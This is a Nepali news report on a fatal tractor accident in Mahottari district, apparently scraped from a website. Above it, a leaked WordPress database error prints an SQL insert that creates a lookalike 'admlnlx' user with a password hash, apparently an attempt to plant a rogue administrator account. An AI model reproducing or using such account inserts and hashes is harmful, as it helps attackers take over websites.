WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0epSYfaA9LsPMhLx9DEe8.oF5MJug/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 13:19:21', '', 'admlnlx', 'admlnlx')
गौशाला, मंसिर २३–
महोत्तरी जिल्लाको धिरापुर गाविसमा बुधबार ट्याक्टरको ठक्करबाट एक महिलाको मृत्यु भएको छ ।
मृत्यु हुनेमा जिल्लाको मटिहानी–५ बस्ने प्रगास यादवकी पत्नी ४२ वर्षीया पुकारीदेवी यादव रहेको जिल्ला प्रहरी कार्यालय महोत्तरीका प्रहरी उपरीक्षक नलप्रसाद उपाध्यायले बताउनुभयो ।
वनबाट आफ्नो घर जाँदै गरेकी यादवलाई धिरापुरबाट मटिहानीको विग्ही नदीमा माटो लिन जाँदै गरेको ज १ त २३०९ नंको ट्र्याक्टरले धिरापुर–९ स्थित बाटोमा पछाडिबाट ठक्कर दिँदा उनी गम्भीर घाइते भएकी थिइन् ।
गम्भीर घाइते महिला यादवलाई उपचारका लागि भारत विहारको मधवापुर सहरमा लैजाँदै गर्दा बाटोमै उनको मृत्यु भएको प्रहरी उपरीक्षक उपाध्यायले बताउनुभयो । घटनापश्चात् प्रहरीले ट्र्याक्टर नियन्त्रणमा लिएको छ भने चालक फरार भएको र उनको खोजतलास भइरहेको जिल्ला प्रहरी कार्यालय महोत्तरीले जनाएको छ । –रासस